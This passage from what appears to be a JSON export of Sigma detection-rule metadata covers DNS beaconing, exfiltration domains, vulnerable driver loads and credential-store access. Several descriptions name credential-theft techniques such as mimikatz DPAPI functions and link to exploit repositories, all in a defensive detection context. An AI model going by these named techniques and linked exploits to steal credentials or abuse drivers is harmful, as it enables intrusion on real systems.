- "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d",
- "value": "DNS HybridConnectionManager Service Bus",
- "meta": {
- "refs": [
- "https://twitter.com/Cyb3rWard0g/status/1381642789369286662",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1554"
- ],
- "creation_date": "2021/04/12",
- "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml",
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "level": "high",
- "falsepositive": [
- "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL",
- "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a",
- "value": "AppInstaller Attempts From URL by DNS",
- "meta": {
- "refs": [
- "https://twitter.com/notwhickey/status/1333900137232523264",
- "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1105"
- ],
- "creation_date": "2021/11/24",
- "filename": "dns_query_win_lobas_appinstaller.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons",
- "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006",
- "value": "Suspicious Cobalt Strike DNS Beaconing",
- 
"meta": {
- "refs": [
- "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns",
- "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1071.004"
- ],
- "creation_date": "2021/11/09",
- "filename": "dns_query_win_mal_cobaltstrike.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects DNS queries for subdomains used for upload to MEGA.io",
- "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3",
- "value": "DNS Query for MEGA.io Upload Domain",
- "meta": {
- "refs": [
- "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1567.002"
- ],
- "creation_date": "2021/05/26",
- "filename": "dns_query_win_mega_nz.yml",
- "author": "Aaron Greetham (@beardofbinary) - NCC Group",
- "level": "high",
- "falsepositive": [
- "Legitimate Mega upload"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. 
(DNS-record will saved in host cache for a while TTL).",
- "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4",
- "value": "Possible DNS Rebinding",
- "meta": {
- "refs": [
- "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1189"
- ],
- "creation_date": "2019/10/25",
- "filename": "dns_query_win_possible_dns_rebinding.yml",
- "author": "Ilyas Ochkov, oscd.community",
- "level": "medium",
- "falsepositive": "No established falsepositives",
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects network connections and DNS queries initiated by Regsvr32.exe",
- "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955",
- "value": "Regsvr32 Network Activity - DNS",
- "meta": {
- "refs": [
- "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
- "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1559.001",
- "attack.defense_evasion",
- "attack.t1218.010"
- ],
- "creation_date": "2019/10/25",
- "filename": "dns_query_win_regsvr32_network_activity.yml",
- "author": "Dmitriy Lifanov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.",
- "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2",
- "value": "Suspicious DNS Query for IP Lookup Service APIs",
- "meta": {
- "refs": [
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- 
"https://twitter.com/neonprimetime/status/1436376497980428318",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml"
- ],
- "tags": [
- "attack.reconnaissance",
- "attack.t1590"
- ],
- "creation_date": "2021/07/08",
- "filename": "dns_query_win_susp_ipify.yml",
- "author": "Brandon George (blog post), Thomas Patzke (rule)",
- "level": "medium",
- "falsepositive": [
- "Legitimate usage of ip lookup services such as ipify API"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect suspicious LDAP request from non-Windows application",
- "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e",
- "value": "Suspicious LDAP Domain Access",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1482"
- ],
- "creation_date": "2022/08/20",
- "filename": "dns_query_win_susp_ldap.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Programs that also lookup the observed domain"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)",
- "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e",
- "value": "Suspicious TeamViewer Domain Access",
- "meta": {
- "refs": [
- "https://www.teamviewer.com/en-us/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/01/30",
- "filename": "dns_query_win_susp_teamviewer.yml",
- "author": "Florian Roth",
- "level": "medium",
- 
"falsepositive": [
- "Unknown binary names of TeamViewer",
- "Other programs that also lookup the observed domain"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects DNS resolution of an .onion address related to Tor routing networks",
- "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544",
- "value": "Query Tor Onion Address",
- "meta": {
- "refs": [
- "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1090.003"
- ],
- "creation_date": "2022/02/20",
- "filename": "dns_query_win_tor_onion.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects DNS queries for subdomains used for upload to ufile.io",
- "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b",
- "value": "DNS Query for Ufile.io Upload Domain",
- "meta": {
- "refs": [
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1567.002"
- ],
- "creation_date": "2022/06/23",
- "filename": "dns_query_win_ufile_io.yml",
- "author": "yatinwad and TheDFIRReport",
- "level": "high",
- "falsepositive": [
- "Legitimate Ufile upload"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects well-known credential dumping tools execution via service execution events",
- "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2",
- "value": "Credential Dumping Tools Service Execution",
- "meta": {
- "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ], - "creation_date": "2017/03/05", - "filename": "driver_load_mal_creddumper.yml", - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "critical", - "falsepositive": [ - "Highly unlikely" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell script installed as a Service", - "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", - "value": "PowerShell Scripts Run by a Services", - "meta": { - "refs": [ - 
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "driver_load_powershell_script_installed_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", - "value": "Process Hacker and System Informer Driver Load", - "meta": { - "refs": [ - "https://processhacker.sourceforge.io/", - "https://systeminformer.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ], - "creation_date": "2022/11/16", - "filename": "driver_load_process_hacker.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects a driver load from a temporary directory", - "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "value": "Suspicious Driver Load from Temp", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2017/02/12", - "filename": "driver_load_susp_temp_use.yml", - "author": "Florian Roth", - "level": "high", - 
"falsepositive": [ - "There is a relevant set of false positives depending on applications in the environment" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", - "value": "Vulnerable AVAST Anti Rootkit Driver Load", - "meta": { - "refs": [ - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/28", - "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "value": "Vulnerable Dell BIOS Update Driver Load", - "meta": { - "refs": [ - "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ], - "creation_date": "2021/05/05", - "filename": "driver_load_vuln_dell_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate BIOS driver updates (should be rare)" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": 
"Detects the load of known vulnerable drivers by hash value", - "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", - "value": "Vulnerable Driver Load", - "meta": { - "refs": [ - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/namazso/physmem_drivers", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", - "https://github.com/tandasat/ExploitCapcom", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/08/18", - "filename": "driver_load_vuln_drivers.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load 
of known vulnerable drivers via their names only.", - "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "value": "Vulnerable Driver Load By Name", - "meta": { - "refs": [ - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/namazso/physmem_drivers", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", - "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/10/03", - "filename": "driver_load_vuln_drivers_names.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "uuid": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "value": "Vulnerable GIGABYTE Driver Load", - "meta": { - "refs": [ - "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", - "https://twitter.com/malmoeb/status/1551449425842786306", - "https://github.com/fengjixuchui/gdrv-loader", - "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", - "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/25", - "filename": "driver_load_vuln_gigabyte_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "uuid": "295c9289-acee-4503-a571-8eacaef36b28", - "value": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "meta": { - "refs": [ - "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/08/18", - "filename": "driver_load_vuln_hevd_driver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "value": "Vulnerable HW Driver Load", - "meta": { - "refs": [ - "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", - "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/26", - "filename": "driver_load_vuln_hw_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "value": "Vulnerable Lenovo Driver Load", - "meta": { - "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", - "https://github.com/alfarom256/CVE-2022-3699/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ], - "creation_date": "2022/11/10", - 
"filename": "driver_load_vuln_lenovo_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate driver loads (old driver that didn't receive an update)" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", - "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "value": "Vulnerable WinRing0 Driver Load", - "meta": { - "refs": [ - "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/26", - "filename": "driver_load_vuln_winring0_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", - "value": "WinDivert Driver Load", - "meta": { - "refs": [ - "https://reqrypt.org/windivert-doc.html", - "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" - ], - "tags": [ - "attack.collection", - "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" - ], - "creation_date": "2021/07/30", - "filename": "driver_load_windivert.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate WinDivert driver usage" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - 
{ - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "value": "Browser Credential Store Access", - "meta": { - "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", - "https://github.com/lclevy/firepwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "creation_date": "2022/04/09", - "filename": "file_access_win_browser_credential_stealing.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", - "value": "Credential Manager Access", - "meta": { - "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "creation_date": "2022/10/11", - "filename": "file_access_win_credential_manager_stealing.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", - "value": "Suspicious Access To Windows DPAPI Master Keys", - "meta": { - "refs": [ - "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/10/17", - "filename": "file_access_win_dpapi_master_key_access.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "value": "Suspicious Access To Windows Credential History File", - "meta": { - "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/10/17", - "filename": "file_access_win_susp_cred_hist_access.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "value": "File Creation Date Changed to Another Year", - "meta": { - "refs": [ - "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" - ], - "tags": [ - "attack.t1070.006", - "attack.defense_evasion" - ], - "creation_date": "2022/08/12", - "filename": "file_change_win_2022_timestomping.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Changes made to or by the local NTP service" - ], - "logsource.category": "file_change", - "logsource.product": "windows" - } - }, - { - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 
(SigRed)", - "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "value": "Unusual File Modification by dns.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2022/09/27", - "filename": "file_change_win_unusual_modification_by_dns_exe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_change", - "logsource.product": "windows" - } - }, - { - "description": "Detect DLL deletions from Spooler Service driver folder", - "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "value": "Windows Spooler Service Suspicious File Deletion", - "meta": { - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "creation_date": "2021/07/01", - "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Deletion of log files is a known anti-forensic technique", - "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", - "value": "Delete Log from Application", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" - ], - 
